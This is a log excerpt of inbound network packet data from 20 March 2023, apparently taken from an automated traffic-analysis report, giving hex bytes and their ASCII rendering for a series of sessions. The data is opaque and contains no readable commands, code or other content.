2023-03-20 10:06:11 UTC	47	IN	Data Raw: 54 7d 7d b9 3e e7 0e 82 26 ef 1c 70 59 03 0e 9d ea a0 e6 cd a0 79 a6 3d 93 e8 b9 2b 11 e5 68 63 c5 ec 32 74 37 48 14 c2 4a d1 be 2e 91 ca 6a 68 83 b8 3a 38 b6 51 60 c9 c3 3c b8 75 7a d1 3a ed 91 6f d0 4e 40 df 8f 72 3a 08 59 c4 b6 42 b0 41 17 66 32 20 5e 0b 34 c7 52 45 42 a4 e3 d1 2f 61 d6 a6 24 c2 76 9f 49 2f 30 d7 4c 0a b8 21 0f a4 2d 00 e2 ab 2f 55 01 5d 60 62 c9 05 7f 7b 93 b9 2f 8d ea 81 43 a4 5b ac 49 94 aa 8f 5d 53 e3 de 76 ad b6 70 22 44 34 16 28 73 a0 d3 4f 98 ae 72 28 8f f4 fd 8f e6 d1 90 15 b7 71 a1 ef 4d eb 2b 91 ab 7d 2f f9 84 8e 8b 6d 0c 2c 4b 97 02 65 34 0b 13 0a 1c 60 a9 2f ae 72 6e b8 d3 68 df 11 fe 45 93 fd 8c 5f f9 ea 27 27 64 82 71 5d c9 f6 79 ef 6a 66 e7 1c 04 dc 4d 6a ac 99 d8 56 93 e5 29 bd 89 a2 6d 20 ae 5a bd a8 b7 3a dd 11 58 e7 Data Ascii: T}}>&pYy=+hc2t7HJ.jh:8Q`<uz:oN@r:YBAf2 ^4REB/a$vI/0L!-/U]`b{/C[I]Svp"D4(sOr(qM+}/m,Ke4`/rnhE_''dq]yjfMjV)m Z:X
2023-03-20 10:06:11 UTC	48	IN	Data Raw: e1 c0 1d 1c dd 48 0c 0e 3f cf 33 d4 e6 22 da 3a 62 6f b8 43 c3 83 c1 14 e9 10 55 45 e0 2c 30 8e 8f 12 72 3e 8d 40 c9 38 16 05 f9 c6 cd 39 b2 a1 c9 c0 2c 59 55 a8 23 b5 a9 ef 67 67 5d 34 a0 e0 6a a5 3e 8d 15 06 cb ca f9 a1 e9 4a 79 7a dd 36 fa cf c7 39 16 4e 0b f7 67 27 56 2d 7f b7 ce b8 d1 94 88 2c 74 37 fa e0 d4 19 24 9e 86 73 44 bf 45 f2 22 e0 70 50 50 88 eb 38 34 cb dc 13 73 33 67 5c 47 8f c1 af b4 db 8e 06 5d 33 18 fd f9 4a c5 f1 91 0a cc fa b2 37 64 19 cb 2d 20 52 a9 90 09 4d c2 01 40 ac 02 8a 43 87 57 60 5a 1d 8a 95 1a 14 d1 7a b8 de e8 6a 42 c1 9e 5d b4 8b 87 8d 60 bb d2 c5 87 9e a9 1c 7c f8 a2 62 f7 f0 4e 21 21 34 70 f8 92 a4 8f 58 ba 8d 9e db 4c 07 db 82 18 f5 58 52 5d 16 c5 ae 27 f8 9e e2 7d b9 27 36 1d d8 14 16 3d cc ee bd 67 c0 c5 9e 88 e7 65 Data Ascii: H?3":boCUE,0r>@89,YU#gg]4j>Jyz69Ng'V-,t7$sDE"pPP84s3g\G]3J7d- RM@CW`ZzjB]`\|bN!!4pXLXR]'}'6=ge
2023-03-20 10:06:11 UTC	49	IN	Data Raw: c6 54 9d c5 74 d9 66 4a 78 7e e6 a6 99 c6 b0 fa df cb 9e 59 63 74 28 d2 18 53 d3 1b a1 a8 31 0a 33 41 aa 5f 08 8c 7e 85 dd cf d4 de 75 95 18 49 9c 0e 30 cb 67 8e 35 b0 31 ea 50 95 1f 63 3a e4 07 5d 53 ee a2 d4 a6 d4 04 d0 68 13 2c 4b 73 df ea c1 32 08 1d 01 bd da 37 af 63 05 d8 62 06 7b 5e f0 b6 a8 84 52 9c a5 c1 96 d6 4a Data Ascii: TtfJx~Yct(S13A_~uI0g51Pc:]Sh,Ks27cb{^RJ
2023-03-20 10:06:11 UTC	49	IN	Data Raw: bf ca 1d b7 fe 0b bc f8 c6 63 70 16 f6 9c 95 e9 d4 1f f6 2b 1d d9 b1 3e 48 19 71 0b f0 c2 b5 dd 85 f6 80 24 45 8d 6f ca a6 6e 39 1e 8c 5c 53 f6 d4 82 a0 e6 a0 56 e7 e6 49 18 7c 42 2d 60 15 70 86 f6 00 4c 14 e7 9e a1 b2 da 64 46 3e 26 6a 07 82 21 e6 56 f4 48 04 88 c2 e3 2e 8e 11 db 6e d4 fe 57 81 1f 01 dd 8d 7f b3 b1 e8 f1 e8 78 5b 02 d7 55 cf a2 34 07 bb cf 85 82 b8 31 1d de 18 fc da c8 3b a2 54 cf b8 44 b9 80 7c c5 d4 38 e1 0d 65 2b 1a 48 c9 88 fc b9 cf 74 30 57 20 5e 05 a9 b7 95 48 da 5c d8 76 3e 55 f0 83 32 df 0f 97 61 14 3a c4 42 51 c8 20 0f a4 ee 57 f3 ae 39 12 b9 5d 60 62 e1 52 7b 6c f6 dd 6b 8c e0 8b 4f bb d6 f6 58 8d 83 a7 5b 4d 64 ac 21 ad b7 69 36 57 0d f8 21 fd c3 e8 1e 8d bd 64 5a 83 d5 eb ee f3 c5 09 f1 aa 59 32 ee 5e ff 3a 9e bc 7c 28 ed b2 Data Ascii: cp+>Hq$Eon9\SVI\|B-`pLdF>&j!VH.nWx[U41;TD\|8e+Ht0W ^H\v>U2a:BQ W9]`bR{lkOX[Md!i6W!dZY2^:\|(
2023-03-20 10:06:11 UTC	51	IN	Data Raw: 5e 23 bb 54 8d d0 60 29 b2 7d 94 34 d0 26 fa 38 33 b2 f6 9c 91 90 6a df 64 4a c4 63 d9 ef 4e ad 49 aa b1 f4 23 79 09 1c 43 a1 17 10 a0 6f b0 95 43 81 84 a5 47 42 ff 91 e9 b2 af 0f 55 43 39 a6 d0 cc cb 5b 07 fc 84 3a 2d b9 e8 3a 1e af 11 de 05 4f e7 58 c5 ec 3f 07 5a 37 7f b2 58 c6 b5 dc 8b 17 ef 81 42 aa 75 04 8e 85 18 69 5d ed 69 99 32 64 64 75 c6 bd 56 c1 8b c9 ca 2d 41 3a c8 22 b5 8a e8 d5 11 5c 24 ee e0 62 cb 45 bc 1d 0c 08 a6 98 a0 a5 40 79 63 b2 49 e7 e7 da 2f 79 26 78 96 23 27 2e 6a 59 b6 ce b8 cc fb ed 5e 6b 3c fa ee b0 7e 0d a5 8c 64 21 cf 36 97 62 e0 08 28 bd 8a eb 32 22 81 b8 61 ca 77 67 24 8a fe d4 bb a9 d5 c5 68 3b 38 3e f1 be a4 c5 f1 91 0b cc ac a1 35 64 13 b2 ab 27 7a 98 83 0d 4f b9 1b c6 e6 08 fa 5c 00 7f 60 5c 36 9e 81 0e 2f 57 78 b8 77 Data Ascii: ^#T`)}4&83jdJcNI#yCoCGBUC9[:-:OX?Z7XBui]i2dduV-A:"\$bE@ycI/y&x#'.jY^k<~d!6b(2"awg$h;8>5d'zO\`\6/Wxw
2023-03-20 10:06:11 UTC	52	IN	Data Raw: e0 13 32 45 fe 26 4e 7e 4d 94 78 cd 17 59 ce 69 cf fb 0a ca 5a dd 57 8d cb 01 bb 35 84 2b a1 10 ec b0 9c f2 fc be ed f5 b1 80 8e 93 24 7d 1d 55 b7 d9 9a 60 3a 4d 80 65 33 37 c7 8a 07 2f f1 0e 69 6d 0e e0 4a dd a7 bb ab c5 54 9d 66 a3 1d 99 94 52 18 aa b2 8a ce d6 9b 96 cc f8 b4 6a 33 ad c7 e6 52 8d c0 a6 cd 72 86 61 40 82 6a aa a9 63 29 aa a5 e7 ae 57 57 31 2b 96 ac 29 ba 7e a9 20 94 75 f9 5d 8b 0c 6b 08 69 a0 5c 43 ef 87 c3 b1 49 17 28 75 1a 08 88 73 df e0 cb 0b 1f 17 82 b3 cb 3a e8 6d 14 c6 4a b0 53 0e fa 9e 99 84 4d 68 bd c9 8a dd 4b f8 c9 2c bf c0 39 14 b3 cd 75 eb 2d c9 86 98 e7 ff fe e5 2e 0c 04 f5 2d 4e 04 54 37 f5 d4 41 f4 d2 f2 9f 27 93 ca 0e d9 a6 6c 34 32 86 50 4e c8 85 88 98 b7 89 01 e7 f8 4e 1a 68 52 fb 5a 06 7b 9d ee 3e 7d 18 fd e1 2f fc cc Data Ascii: 2E&N~MxYiZW5+$}U`:Me37/imJTfRj3Rra@jc)WW1+)~ u]ki\CI(us:mJSMhK,9u-.-NT7A'l42PNNhRZ{>}/
2023-03-20 10:06:11 UTC	53	IN	Data Raw: 2f 3e d0 b6 7a e0 27 1e a9 12 3f ef a2 3a 41 e2 5d 60 6c 47 7d 69 69 e1 f9 2c f1 96 81 5c b8 f3 e5 41 85 a3 cc 59 36 18 84 76 a9 39 0a 34 49 f3 07 f7 70 e9 fb 05 9b 86 09 29 9e fa 9f 90 e0 d8 05 2d a9 72 26 ef 52 e8 27 82 be 67 29 28 1f b0 a3 fe 0e 51 37 97 13 64 25 12 77 4b 0c 64 b0 26 a9 64 75 87 89 21 de 11 eb 49 8e fa e0 b5 93 eb 2d 3e 72 f9 0a 35 de f5 fd ae 69 f0 e7 16 1f c5 5c 9a 6e eb d9 5c 88 c4 2a 3e 89 a8 4f 5e a5 4b bd ba 41 3b f9 39 6a f4 2a d4 59 59 67 5f 84 85 fd d2 64 61 b2 4e 13 98 8d 39 b3 20 20 b4 66 a9 f6 db 7e ac 97 47 10 a6 24 dd dd 71 25 99 ec 87 32 c5 8b d3 23 50 b1 20 b4 f5 80 6e f1 31 41 db 79 77 c8 45 d9 8e 9a ba ac 94 50 77 1a 50 a7 20 47 ac 6d ab 13 53 eb 85 a1 4d 53 de e2 9b b3 bc 35 47 45 fb cc d1 cc 91 73 68 ec 84 42 24 87 Data Ascii: />z'?:A]`lG}ii,\AY6v94Ip)-r&R'g)(Q7d%wKd&du!I->r5i\n\>O^KA;9jYYg_daN9 f~G$q%2#P n1AywEPwP GmSMS5GEshB$
2023-03-20 10:06:11 UTC	54	IN	Data Raw: ff ce 07 20 f1 99 45 42 a9 4c e1 68 e0 04 56 d8 9a e1 ee ba ce ca 61 c8 55 11 2d e5 91 d7 c0 d0 f3 cd 03 4c 3f 4d 91 d0 2f cf e0 95 75 af c2 c6 3e 4c 75 dc 20 2d 6b 9d 86 9f 34 bd 72 c7 ec 2a 96 54 0a 5e 48 37 1d 9e 8b 1f 33 70 ec 0f bb b5 50 42 cb e9 ca 38 d9 83 8d 7e ab 9a c6 fc e2 81 27 78 e9 ad 5b b8 27 c1 0b 32 30 7b e9 86 b3 f8 21 bd 9c 91 d9 45 4c 92 80 18 ff 77 16 67 16 cf b5 3b e6 1c 82 1f ca b8 76 35 c4 06 1c 2f 50 e2 aa f1 b2 8b 89 99 ea c1 7e ee 20 cf af 1f 91 f0 31 ac df 32 d1 97 ba 8d f4 6b 83 17 bb 61 30 4e 97 e5 4c 52 af f7 12 14 bc 84 a4 e3 81 b2 6f 25 0b e4 a4 fd e3 30 04 56 46 cf 23 39 78 4a 90 ce ca 71 fc a5 ee 13 45 12 f3 02 52 57 1b 54 46 ac 6c db 82 b2 90 44 24 58 e9 c5 b2 5a 4e 3f 2a ca 43 76 3f f2 19 40 44 e1 a5 48 d7 a5 c0 d8 c5 Data Ascii: EBLhVaU-L?M/u>Lu -k4rT^H73pPB8~'x['20{!ELwg;v5/P~ 12ka0NLRo%0VF#9xJqERWTFlD$XZN?Cv?@DH
2023-03-20 10:06:11 UTC	56	IN	Data Raw: 49 33 70 26 a3 c8 2e d1 59 31 d0 66 16 30 82 15 c1 c3 64 6a 1c d3 dc 09 d4 63 f1 1c c1 32 e0 a6 d9 6d 3a 40 0a 21 0f 7f d1 88 30 91 35 a4 84 c1 e1 c1 b4 bc 21 a1 7b 5f 13 e7 f8 18 19 81 f2 92 ba cd a2 ea 8f 67 1c ed a7 39 0e 13 c1 b9 20 eb aa 4e c4 18 fb 35 db 18 8c 5a a3 fc fb 8e 18 d1 70 f1 05 86 59 86 e6 7e 90 ec 64 73 80 52 e8 04 1b 91 91 b7 eb ad ba 27 49 b6 e3 5c bd 2c 7f 47 cf 37 35 f0 9f e8 3a d5 4f 5b 09 47 bb 8c 6c 90 2b b6 d4 08 e3 f7 c7 fd a6 7e 5d b5 46 18 83 e7 93 2e a0 f0 45 bc 7a b8 33 80 35 bd d0 2f 22 59 dc aa e7 f2 b6 83 c4 3b b7 d4 0d df f0 70 04 0d f8 a8 27 c4 a4 5e 77 43 c8 12 3f 6e fc f5 2e 8d e0 81 5c 24 28 09 b6 4a 8b e9 1f 4d 6e 85 62 53 b4 65 33 b3 26 4f 26 eb 37 fa 5a 67 bf 0c 6c 9e f0 ea b6 d4 d8 1e 76 77 9f 12 dc 4d eb ab a8 Data Ascii: I3p&.Y1f0djc2m:@!05!{_g9 N5ZpY~dsR'I\,G75:O[Gl+~]F.Ez35/"Y;p'^wC?n.\$(JMnbSe3&O&7ZglvwM
2023-03-20 10:06:11 UTC	57	IN	Data Raw: 03 0e e2 a3 86 57 3e be 2b 5d b8 77 f9 8d ed 19 0b da 84 de 5c 3c b7 a4 98 fe ad 63 e1 31 59 db 44 76 db 44 51 63 9c 6b 97 99 47 64 05 7b 19 3d 56 a0 70 94 18 31 91 95 b8 c8 5c d5 91 eb c9 c7 3f 56 47 97 af ba 32 99 48 1d fc 9e 71 1b e9 e8 4a 03 f2 4f 8e 14 2f de 2e 4a f2 35 0c 2b 13 05 b2 52 ce 95 a5 ea 16 e9 9d ab c4 17 1f 9f 94 21 f0 33 8d 68 86 08 1b 0d 5c b3 cd 39 b6 f8 a3 c1 2d 43 2b c6 22 b5 8a c7 c9 60 5c 2e f2 1e 6b b7 39 ac 01 2a 7a d6 c8 ac a7 31 01 6b dd 2d f7 e1 c1 33 c0 cb 66 96 29 25 5d 78 39 b7 ca a3 c2 bc 66 5f 6b 3c f8 9d ac 1e 0c a1 97 74 3d c1 36 97 62 f1 0f 34 b6 8a eb 32 1d 82 cb 61 c0 6c 74 5f 97 9a d5 b1 8b 9f cc 07 57 11 53 fa d1 25 d4 e1 8a 1f 4b dd c6 34 66 62 a7 20 27 7e 25 ff 7c 46 d6 79 65 e6 3a f3 54 0a 54 7f 69 11 9c fa 7b Data Ascii: W>+]w\<c1YDvDQckGd{=Vp1\?VG2HqJO/.J5+R!3h\9-C+"`\.k9*z1k-3f)%]x9f_k<t=6b42alt_WS%K4fb '~%\|Fye:TTi{
2023-03-20 10:06:11 UTC	58	IN	Data Raw: fc 06 25 1a ea 1a ec eb 3a fb 26 9e 24 48 94 c5 99 12 59 79 28 ca fb ad e8 5f dd c6 72 cf 01 30 eb 80 2b 29 90 e8 b0 fb 88 f8 be b2 a2 b5 80 d0 6a 27 7d 52 a6 b4 d9 dc b0 39 4d a1 d2 c6 c4 3f 1b 05 e0 0d 8b be 93 f6 55 b4 22 58 4a 57 3a ab 68 3e a3 1d 28 b7 8d 92 a1 4f 75 30 a5 98 6a 34 97 b7 96 93 2e 2c e7 ac 43 c3 48 46 9f 7b 9e be 4a a3 55 56 85 0a 93 7a cb 50 a2 28 43 b7 69 53 4a 3e 89 7a 93 42 da 06 eb 7f f3 92 9f 97 5f a2 8d d5 8e ce b6 57 e9 ef 7a 0c 2f 71 74 9a e2 d0 3b 19 17 10 b1 cb 92 40 92 eb 09 6a c5 3f 5e fa 9f 87 7a 51 91 a0 2f 84 86 54 38 27 2f f9 33 36 ed ad cd 75 eb 16 f9 9c 95 e9 22 e2 d6 18 17 03 63 16 2a 18 59 2c 8a ca 93 f3 eb a7 80 2e 67 c8 68 e0 ed 61 3e 1e 8d 4d 43 de ee 82 a0 ec b5 08 e7 e6 11 02 6d 45 09 5b 15 70 b2 ec 12 58 1c Data Ascii: %:&$HYy(_r0+)j'}R9M?U"XJW:h>(Ou0j4.,CHF{JUVzP(CiSJ>zB_Wz/qt;@j?^zQ/T8'/36u"c*Y,.gha>MCmE[pX
2023-03-20 10:06:11 UTC	59	IN	Data Raw: f7 35 e6 f2 97 15 33 c8 4f 66 0d 10 0c b9 15 04 f4 eb 3a 3a 94 5d 60 68 c9 14 c6 93 03 0a f0 ad 95 c5 5c bc d7 e2 b7 97 ac 8a a5 4e 31 8c 60 53 b6 3c db 5c 51 54 21 fd c8 d3 31 99 ae 72 f6 58 d0 d8 9e ea 58 36 1e a9 59 38 95 45 cd 2d a8 ff 63 3e f4 92 96 89 ff 1c 2c 41 96 13 61 25 a0 be 47 11 ce a3 2f bf 6c 4f bc bc 30 df 11 f4 18 82 f8 f2 c6 f9 c2 7d 34 6c 99 79 41 21 fe ef 8b 10 e2 e3 05 03 cd 3f 3b 1d 99 dc d2 eb ff 43 29 9a a4 4c 05 be 46 b5 d9 10 2c f8 3d 7d e1 b6 a4 38 55 64 26 ea eb 91 d8 7b 0f b7 47 79 99 87 25 65 52 32 b3 7d b8 24 d1 76 b1 97 51 2f ab 10 c3 d1 60 3d 97 2a 92 23 0c 97 d9 30 47 a6 a1 ad 25 9e 67 fa 33 4e d1 97 7a d9 5c ce 02 a7 b6 9b 8b 5c 63 16 68 a4 20 5d ad 6d b9 04 24 a9 98 a0 47 44 df ba e9 6f 39 3f 56 43 80 b1 88 da 97 1e 0a Data Ascii: 53Of::]`h\N1`S<\QT!1rXX6Y8E-c>,Aa%G/lO0}4lyA!?;C)LF,=}8Ud&{Gy%eR2}$vQ/`=*#0G%g3Nz\\ch ]m$GDo9?VC
2023-03-20 10:06:11 UTC	60	IN	Data Raw: d4 5e 6b 30 e9 fe ce 0b 63 92 87 73 48 b8 2e 8a e5 df 00 47 dc ae fd 4a 4e ba ca 11 68 58 70 3d fc 39 f0 a3 d1 48 e5 07 2d 9b 1b e2 c0 38 67 d4 81 74 f5 e2 c6 44 c6 3c c6 31 3f d8 b7 8c 7b 04 f7 73 b7 44 2a 79 55 0a 5e 73 4c 62 95 81 0e 38 76 6c 90 92 c0 51 48 41 9f 4a 38 dd 87 9c 75 84 40 d7 93 85 95 36 6f 76 c1 b4 b6 e2 54 3a 28 0a 11 14 68 4a a3 1c bd 9c 9d ee 35 a7 f9 81 1c 9a d8 7b 66 1c d6 bf 1f e2 98 ea 5c 43 b9 7c 17 bb 1b 0d 39 69 b5 bc 67 c7 c6 88 8b fb c1 9b ee 20 cf ad 0d 98 7b 6f 26 00 3d c9 a4 28 9a e7 61 ab 61 d5 60 3a 5f 92 fc 06 e5 87 3e 03 31 92 35 d9 61 8b a1 75 3a 1a b8 a6 86 9c ee 04 52 1f e4 6e 39 72 36 fe cf ca dd d4 d6 ef 0e 4f 04 0d c0 41 4d 0a 40 7f 2f 6c db 82 ad aa 4a 26 23 9f 45 b3 5e 5f 15 3b c0 95 56 1e f2 19 4d 6c 09 a5 48 Data Ascii: ^k0csH.GJNhXp=9H-8gtD<1?{sD*yU^sLb8vlQHAJ8u@6ovT:(hJ5{f\C\|9ig {o&=(aa`:_>15au:Rn9r6OAM@/lJ&#E^_;VMlH
2023-03-20 10:06:11 UTC	62	IN	Data Raw: 9f 93 8e 41 8a a7 cd af 81 5d 2e df 08 a6 df 3c b1 60 cc 75 e0 2d d0 8d 88 ce 1d fa f9 39 0c f7 f5 2d 48 18 42 49 f1 c2 bf ff c3 2b 80 2e b3 d8 4b e2 98 7d 3e 14 9f 53 43 f6 bf 82 a0 e6 56 01 e7 cc 02 47 6d 45 07 5b 15 70 2a e5 12 58 1a f4 ec 3e 3b da 14 55 24 3e e7 04 82 21 e7 73 e0 59 03 04 10 e2 2e 8f 9c fe 79 a6 96 1c 81 6f 26 9f 8c 7f b9 13 fb e4 f9 6d 48 14 c2 46 d8 b6 e6 1e a3 42 e0 83 b8 30 28 c8 0f 60 8d c7 2a b1 67 c4 bc 44 6b 90 6f d4 a0 29 f7 0d 72 3a 16 53 d2 ab 5c b5 d9 73 07 76 08 49 0e ba a4 f6 17 9a cd bb 6a ad 60 dc ac 0b e3 18 0d 43 3c 3e b6 63 78 f3 50 1c ab 2f 01 7d c7 2e c4 95 4e 66 79 cf 38 7f b1 60 f4 2e 8d e0 90 58 af d1 e0 5a 9c 80 d8 4a 4a 7f 8c ec be be 72 2c 3f 46 44 21 8d e1 78 04 99 a4 6b 22 8f fa 65 f7 f6 26 1c 6f a2 48 39 Data Ascii: A].<`u-9-HBI+.K}>SCVGmE[pX>;U$>!sY.yo&mHFB0(`gDko)r:S\svIj`C<>cxP/}.Nfy8`.XZJJr,?FD!xk"e&oH9
2023-03-20 10:06:11 UTC	63	IN	Data Raw: 53 21 a4 6c bf 08 9c 6d bc 87 4c 0c ab 3b 0b d0 60 23 fa 3b 94 25 da 84 cb 2b 55 bc b2 90 f7 8c 71 ed 0a 5d c5 69 71 b8 96 88 0a fb 99 06 80 51 7d 34 6a aa 3f 5c b3 6b c8 3e 21 81 f4 b2 42 53 d1 1f 80 a4 42 3e 45 45 99 a0 fc c9 46 c7 06 ed 84 48 1d ef fb 4d 0a ce 4a a7 41 2e c8 26 cd 76 26 05 38 61 0c d1 06 ca cd 9b 68 17 ef 81 46 cf 15 0e 00 e6 0e 9f 30 9e 63 88 33 3a 07 36 cc db a3 b9 9c c4 c0 2d 40 46 a4 32 b9 ac e5 ab 68 74 7d e5 e0 6c 82 0e ab 1d 06 0f c1 ee 77 b6 42 68 63 cc 2e 68 8e 2e 3c 05 49 68 9b 04 89 2f 16 37 a6 c0 8b f9 95 8e 5f 6b 31 89 62 de 1e 06 b6 96 62 5e c4 bc 97 68 ea 13 56 ae 0e ea 38 3f fd d8 70 d8 6c 76 43 e0 9b d5 90 b0 fc 13 09 5d 28 2e d7 d9 3e d5 9e 9a 06 c4 c9 c6 e8 75 16 b2 0e 26 7a 94 83 1a 51 c5 67 ff 61 02 fa 55 1b 47 71 Data Ascii: S!lmL;`#;%+Uq]iqQ}4j?\k>!BSB>EEFHMJA.&v&8ahF0c3:6-@F2ht}lwBhc.h.<Ih/7_k1bb^hV8?plvC](.>u&zQgaUGq
2023-03-20 10:06:11 UTC	64	IN	Data Raw: 7a ba 68 29 53 89 f0 f6 ef 96 e9 3b 4d bb 01 df 47 aa a4 6b 3a 23 e0 b1 50 85 38 15 5a 24 a2 ac 50 8c 30 ed c2 db 76 f9 78 e6 00 41 15 03 3a 63 4c 0a 4e 7f 28 1f 5f 83 ad a0 5b 36 32 8f aa 39 5e 5f 30 28 d1 e6 7c 1e f2 13 51 7e 18 b7 59 cc c8 be ab c5 7f 8e cd 82 ec 66 5b 62 41 e6 a3 9a a0 c3 65 95 c1 ee 96 78 63 ca ff 19 53 d4 2d a4 af 25 92 59 c6 aa 5e aa b8 7a e6 78 1f c7 bb 2f fc 18 49 e6 bf 35 d1 63 ea 65 bd 25 ff 75 db 0d 6d 24 7a b7 4c 46 80 c2 c3 b1 4e 3f 85 78 1b 02 63 6b ce f5 bf 0c 18 17 16 a2 d2 27 33 52 14 d7 4b 95 6d 2c 9c c7 93 f4 f0 b3 a1 c0 9e 7b 79 36 ab 95 8e cd 57 3b cc d4 64 fd 9c e8 86 e7 d2 dd 24 86 89 32 12 f2 26 ea 3d 45 54 b3 e3 bf 85 61 df 03 2e 6d c2 7d dc d2 76 3e 1e 88 5c 55 f6 a9 82 a0 e6 08 0a e7 e6 47 0b 7c 51 12 8d 06 64 Data Ascii: zh)S;MGk:#P8Z$P0vxA:cLN(_[629^_0(\|Q~Yf[bAexcS-%Y^zx/I5ce%um$zLFN?xck'3RKm,{y6W;d$2&=ETa.m}v>\UG\|Qd
2023-03-20 10:06:11 UTC	65	IN	Data Raw: 51 39 70 c9 c9 60 cb 19 0b 61 75 3b c4 4e 6a e4 31 1a c1 7b 04 f3 a8 10 60 95 5d 66 7b d1 05 6f 03 cb f4 2e 8b f3 98 41 31 e9 f6 49 95 8e 8a 29 97 34 84 06 0f 92 74 34 54 87 35 39 8f 72 d3 05 e9 0c 5d 31 8f e7 49 bb fa aa 2f 5d a9 29 90 ca 56 f0 33 22 8a 7f 4c bd b3 90 d3 5c 24 af 41 97 Data Ascii: Q9p`au;Nj1{`]f{o.A1I)4t4T59r]1I/])V3"L\$A
2023-03-20 10:06:11 UTC	65	IN	Data Raw: 19 73 33 73 77 47 1d 64 b2 39 97 31 7f bf b6 a6 d5 11 f4 41 82 e9 f7 d1 2f f9 39 25 78 82 6a d0 b6 0b f3 95 1f e0 fd 26 66 30 bb bd 35 ce d9 5c 84 ca 38 a7 89 a2 63 5c 23 4a b7 a8 7a 37 d3 2b 7e fc 04 43 55 55 6e 3f f2 95 e1 f0 23 04 d8 3b 5e 99 9f 28 b3 da 20 b4 66 ac 15 c9 70 91 67 89 33 bd 20 2d c7 73 23 9a 20 fb 35 da 84 d5 21 9d b7 a4 42 f1 a4 46 c3 22 4a ce 7a 65 ca 7c 8f 0a 8b bb 5a 81 51 5d 5d 0f ab 3f 54 a0 6f ba bf 20 81 84 bc 47 42 d5 56 e9 b2 bc 31 56 43 88 a6 d0 cc 9b 59 07 ed 84 cc 0d eb e8 65 1c dd 42 3f 04 3f cf 38 c5 ec 35 0c 29 68 7e b2 52 ca bd b2 eb 16 ef 4e 54 c5 04 c2 8f 8f 18 71 32 8d 68 dd 38 16 0e 3c f6 ce 39 2b 8b c9 c0 4c 49 55 b9 23 b5 a8 bf ba 61 56 24 fb 1e 61 bc 28 bf 1e 2e 4b c8 f9 a7 75 4c 79 6b c6 01 cb e7 d0 32 3e cf 78 Data Ascii: s3swGd91A/9%xj&f05\8c\#Jz7+~CUUn?#;^( fpg3 -s# 5!BF"Jze\|ZQ]]?To GBV1VCYeB??85)h~RNTq2h8<9+LIU#aV$a(.KuLyk2>x
2023-03-20 10:06:11 UTC	67	IN	Data Raw: f1 55 8d 61 99 85 ec 96 bc ad 20 6d eb bb 5f b2 da 5c 3a 26 18 ab eb 97 bf 98 62 ad b5 b7 cd 5a 2b ea 94 18 8b c7 7a 66 12 d4 b1 46 50 d6 f1 04 e3 fe 7c 1d a2 2f 48 24 41 eb d2 ea c0 e0 82 99 f1 fc 60 55 7c c5 ce 38 cf 66 42 cd f6 66 da bf d0 0c 63 61 ab 7e c4 f9 3a 5f 9c 82 4d e5 87 e4 7c 99 bb 01 d3 61 ff 25 6b 3a 36 9a 68 da 96 40 2c 55 35 a5 09 3b 1d 57 ff cf cc 71 ff d6 e9 39 4f 04 16 33 45 4d e3 4e 7f 2f 08 db 82 bc aa 36 27 22 9f cf b9 5c 2c b4 3a c0 9f f5 1f f0 31 d8 6c 09 af 45 d4 29 d2 83 ca 55 9d c8 57 eb 70 4d 7b e3 87 9a 9a ce c2 6f 95 d9 ea b4 7c 45 a5 d1 1a 41 d7 c0 a2 90 36 86 63 53 af 48 d7 30 69 f7 68 97 d1 a9 20 4d 19 49 92 be 26 c9 f8 ec 5b 27 25 f9 59 93 09 7f 26 7f 88 06 52 ef 81 d4 4f 49 04 d9 68 1d 28 3a 62 db 9b 4b 3b 19 13 06 4f Data Ascii: Ua m_\:&bZ+zfFP\|/H$A`U\|8fBfca~:_M\|a%k:6h@,U5;Wq9O3EMN/6'"\,:1lE)UWpM{o\|EA6cSH0ih MI&['%Y&ROIh(:bK;O
2023-03-20 10:06:11 UTC	68	IN	Data Raw: 21 e7 53 e2 59 03 00 90 e3 2e 8e b3 fe 79 af 39 1d 81 6e 29 9f 8c 62 b9 13 fb e3 f9 6d 48 13 c3 46 d8 b4 27 1f a3 42 22 04 a8 31 38 c8 0f 60 c9 c1 2a 5e 77 62 a3 42 b3 a8 75 be db 23 f7 f5 6d 0a 17 5f c6 a3 50 2f d4 74 18 18 29 1f 11 b0 ae 41 4c fc d8 c1 42 50 78 88 ba 29 ca 34 15 38 39 34 c4 4d 75 af 36 05 ae 06 21 14 ae 2a 3a 4b 42 c7 48 c7 14 a2 72 b0 ee 38 8d 0e 98 e7 a1 dc f6 1c 8d df be 51 4d 38 99 46 b8 bd 63 a5 41 15 05 2b fd af db 35 8c a4 78 c9 8c c0 fe 88 e0 8c 01 c7 b4 53 32 87 44 d1 3e 8a af d2 1f e4 83 9a a3 69 07 1c 54 9d 13 da 25 12 79 4d 1d c0 b6 1f aa 7d 7f a2 b3 20 c2 1b f4 db 8d fe ff cc f9 7c 20 78 77 fc 79 cb c3 f5 f7 8c 05 03 ea ae 18 c5 44 8d 13 2b ce 56 82 69 49 8d 9f a8 67 0e ab f9 a1 a8 69 7a f7 8b 7a ed 2c 80 5a e7 72 26 ee 5a Data Ascii: !SY.y9n)bmHF'B"18`^wbBu#m_P/t)ALBPx)4894Mu6!:KBHr8QM8FcA+5xS2D>iT%yM} \| xwyD+ViIgizz,Zr&Z
2023-03-20 10:06:11 UTC	69	IN	Data Raw: 3f cf 7a f5 b7 0e 09 29 69 7e b3 52 ca bd b3 eb 9e d5 78 6b cc 04 05 8e 8d 18 61 33 9d 68 ea 3b be 21 2a c6 cc 39 b1 8b cc c1 2d 49 85 b5 23 b5 8d ef bc 61 55 24 e1 e1 6a a4 ad a6 1d 06 13 c9 fe a1 b5 4a 7c 6a dd 29 79 e7 d0 38 1b 44 7e 96 3e 27 26 04 39 b7 fa 8e cf ad 83 5f 63 36 e3 e6 df 1f 1c a5 d1 4a 6b 85 12 97 62 e0 1c 47 dd 8a eb 38 68 d2 42 4a c7 7d 6c 2c fa 9b d4 bb a3 f3 d8 3f 14 08 33 fb da 2f e5 f1 9b 07 d4 c3 48 12 4b 2f d0 20 2c 7a b7 90 0b 46 d6 73 70 ff 02 fa 14 0a 65 60 ca 1c 9c 81 0e 3c 2a 67 b8 d4 fd 51 73 c1 00 4a 3a d9 87 8d cc 8a 96 c4 8a 94 b2 27 eb f8 ab 4b b2 f1 18 2e 32 30 38 eb ae b5 2d 4b b9 bd 9b c8 0d 3b f9 81 15 f5 66 7a cc 16 c4 a5 24 f0 76 c2 d2 ec b5 7c 26 a8 aa 1c 2f 40 ed bd 79 c2 e0 88 c0 e0 a0 12 59 20 cf bf 10 89 b9 Data Ascii: ?z)i~Rxka3h;!9-I#aU$jJ\|j)y8D~>'&9_c6JkbG8hBJ}l,?3/HK/ 